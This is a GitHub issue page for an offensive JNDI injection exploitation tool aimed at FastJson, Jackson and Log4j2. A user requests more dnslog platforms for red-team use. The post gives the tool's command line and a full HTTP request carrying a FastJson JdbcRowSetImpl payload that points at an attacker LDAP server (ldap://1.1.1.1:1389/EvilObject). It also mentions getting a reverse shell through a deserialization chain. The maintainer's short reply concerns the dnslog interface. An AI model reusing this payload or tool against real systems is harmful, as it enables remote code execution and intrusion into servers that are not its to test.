exp1orer / JNDI-Inject-Exploit

解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入
MIT License
663 stars 112 forks source link

建议增加多个dnslog平台 #6

Open M00nT0 opened 2 years ago

M00nT0 commented 2 years ago

ceye.io为国内dnslog平台并且注册需要手机号作为验证,在红队攻击中使用是大忌..... 并且今天测试无法检测到漏洞,手动用其他工具ldap是可以出来的并且可以用目标本地cc1链反序列化反弹shell 使用命令:java -jar JNDI-Inject-Exploit-0.2-all.jar ip="1.1.1.1" file=test.txt

test.txt内容

POST /api/test HTTP/1.1
Host: https://baidu.com
Content-Type: application/json
Content-Length: 204

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$%7bjndi:ldap://1.1.1.1:1389/EvilObject%7d","autoCommit": true}}
exp1orer commented 2 years ago

下个版本会重构Dnslog接口,建议用户自行实现该接口,因为考虑到多个dnslog平台的API接口不一致的问题。